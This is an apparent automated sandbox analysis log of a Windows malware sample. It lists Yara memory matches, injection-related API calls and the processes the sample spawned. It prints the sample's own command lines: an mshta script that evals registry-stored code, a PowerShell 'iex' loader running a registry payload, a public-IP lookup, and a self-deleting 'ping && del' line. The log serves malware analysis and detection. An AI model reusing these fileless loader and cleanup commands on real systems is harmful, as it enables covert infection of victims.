Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C4AFC0 |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C47FBE |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C4836E |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A559E4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A57548 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3C3E4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A39098 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A35420 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4C400 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A44818 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A50468 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3847C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A41C44 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A58448 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A365A8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A329B0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A591B0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4CDC4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A40DC8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4B1D0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4993C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A53D68 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A48974 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A59AA8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A45AB4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3AAB4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A42A90 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4DEE8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A452D0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A31638 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4220C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A35A1C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A477A0 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3CFF8 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A39FC4 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A33764 |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A5137C |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A51B4C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D27548 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D259E4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D2137C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D177A0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D21B4C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D03764 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D152D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1DEE8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D0847C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D09098 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D28448 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D11C44 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D20468 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D0CFF8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1C400 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D14818 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D05420 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D09FC4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D0C3E4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D065A8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D029B0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D291B0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1993C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D23D68 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D18974 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D12A90 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D29AA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D0AAB4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D15AB4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D01638 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1220C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D05A1C |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D10DC8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1B1D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1CDC4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D3B5A4 |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_037413FA |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0374B006 |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_00401703 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C45CD1 GetProcAddress,NtCreateSection,memset, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C49E79 NtMapViewOfSection, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Code function: 0_2_03C4B1E5 NtQueryVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4B080 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A474E0 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A570F8 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A48078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A48844 NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A43104 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A4B164 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3B964 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A54200 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A3C3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 21_2_00A6B00B NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D1B164 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D24200 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 31_2_000001B888D3B00B NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_037407E8 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0373B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0374FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0373A63D memset,NtQueryInformationProcess, |
Source: unknown | Process created: C:\Users\user\Desktop\FpYf5EGDO9.exe "C:\Users\user\Desktop\FpYf5EGDO9.exe" |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: Yara match | File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
